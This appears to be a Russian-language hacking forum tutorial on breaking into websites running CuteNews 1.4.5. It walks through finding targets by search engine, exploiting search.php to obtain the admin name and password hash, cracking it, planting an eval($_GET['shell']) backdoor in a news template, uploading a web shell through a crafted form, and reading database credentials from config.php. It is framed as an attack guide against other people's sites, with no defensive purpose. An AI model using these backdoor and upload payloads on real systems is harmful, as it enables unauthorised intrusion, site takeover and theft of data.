1. Поиск в гуглом:
© Project -= Moy-weB =-
2. После того как погуглили идем на целевой сайт и заходим в директорию /news/ если есть, то хорошо, если нет гуглим дальше.
Так же обязателен файл /news/search.php
3. Дальше используем сплоит для поиска админа
Code
$target = 'http://localhost/cutenews.1.4.5/search.php'; здесь указываем путь к файлу search.php.
3. Следующим шагом будет использование сплоита для поиска MD5 хэша админа.
$target = 'http://localhost/cutenews.1.4.5/search.php'; Путь к файлу search.php
$username = 'waraxe'; Ник админа (получен с помощью первого сплоита).
Если не хотите использовать сплоиты, вы можете восплользоваться этим сайтом
4. Расшифровываем хэш. И идем в админку сайта - /news/
Заливаем шелл
1. Идем в Настройки - Редактировать шаблоны - Активные новости
2. Видим текстовое поле. Туда пишем:
Code
HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);
3. Далее проверяем news/show_news.php?shell=phpinfo();
Должна появиться информация о PHP. Приступаем к заливке шелла.
4. Создаем файл HTML :
Code
<form action=http://site.com/news/show_news.php?shell=copy($_FILES[file][tmp_name],$_GET[aa]);&aa="локальный путь сайта"\news\shell.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form>
5. Радуемся шеллу по адресу - http://site.com/news/shell.php
Данные для подключения к БД находятся в /config/config.php